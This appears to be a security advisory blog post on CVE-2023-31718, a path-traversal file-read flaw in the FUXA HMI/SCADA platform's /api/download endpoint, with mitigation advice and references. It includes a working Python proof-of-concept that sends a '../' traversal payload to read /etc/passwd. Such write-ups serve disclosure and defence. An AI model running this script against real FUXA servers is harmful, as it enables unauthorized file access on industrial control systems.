FUXA, a popular web-based HMI/SCADA visualization platform, has been found to be susceptible to a local file inclusion (LFI) vulnerability. The vulnerability is present in FUXA versions 1.1.12 and below. In this post, we will explore the details of this vulnerability (CVE-2023-31718), provide a code snippet to demonstrate the exploit, and share links to the original references.

Vulnerability Details

The LFI vulnerability resides in the /api/download functionality of the FUXA platform and can be exploited by an attacker with access to the local API. By exploiting this vulnerability, an attacker can read sensitive files on the server, leading to information disclosure or even unauthorized command execution.

The LFI vulnerability is caused by insufficient validation of user-supplied input in the 'file' parameter of the /api/download API endpoint. An attacker can manipulate the input to include local files, leading to these files being read and displayed.

Exploit Example

The following Python code snippet demonstrates how an attacker can exploit CVE-2023-31718 to read sensitive files on the server:

import requests

target_url = "http://<target-ip>:<port>"
lfi_file = "../../../../../../etc/passwd"  # Example file for demonstration purposes

vulnerable_endpoint = f"{target_url}/api/download"

# The 'file' query parameter is passed to the endpoint without path validation
payload = {
    'file': lfi_file
}

response = requests.get(vulnerable_endpoint, params=payload, timeout=10)

if response.status_code == 200:
    print(f"[*] Successfully retrieved contents of {lfi_file}:")
    print(response.text)
else:
    print(f"[!] Failed to retrieve contents of {lfi_file}")

Replace <target-ip> and <port> with the relevant IP address and port number. Running this script will send a request to the vulnerable endpoint with the malicious payload, resulting in the contents of /etc/passwd being read and displayed.

It is important to note that this is an example, and the attacker could request any file they have knowledge of or can determine the presence of on the target system.

Mitigation

To mitigate this vulnerability, users should update their FUXA installations to version 1.1.13 or later. In addition, developers and system administrators should ensure that proper security measures are in place, such as validating and sanitizing user input, restricting access to sensitive files on the server, and implementing least-privilege permissions for accessing the system.

For more information on this vulnerability, refer to the following sources:

1. CVE Details for CVE-2023-31718
2. NVD - CVE-2023-31718
3. FUXA GitHub Repository

Conclusion

CVE-2023-31718 is a critical local file inclusion vulnerability affecting FUXA 1.1.12 and earlier. By exploiting this vulnerability, an attacker can gain unauthorized access to sensitive files on the server. It is recommended that users upgrade their FUXA installations to version 1.1.13 or later to mitigate this vulnerability.

Please be aware that exploiting this vulnerability without proper authorization may be illegal. The information provided in this post is for educational purposes only.

Timeline

Published on: 09/22/2023 00:15:00 UTC
Last modified on: 09/25/2023 16:43:00 UTC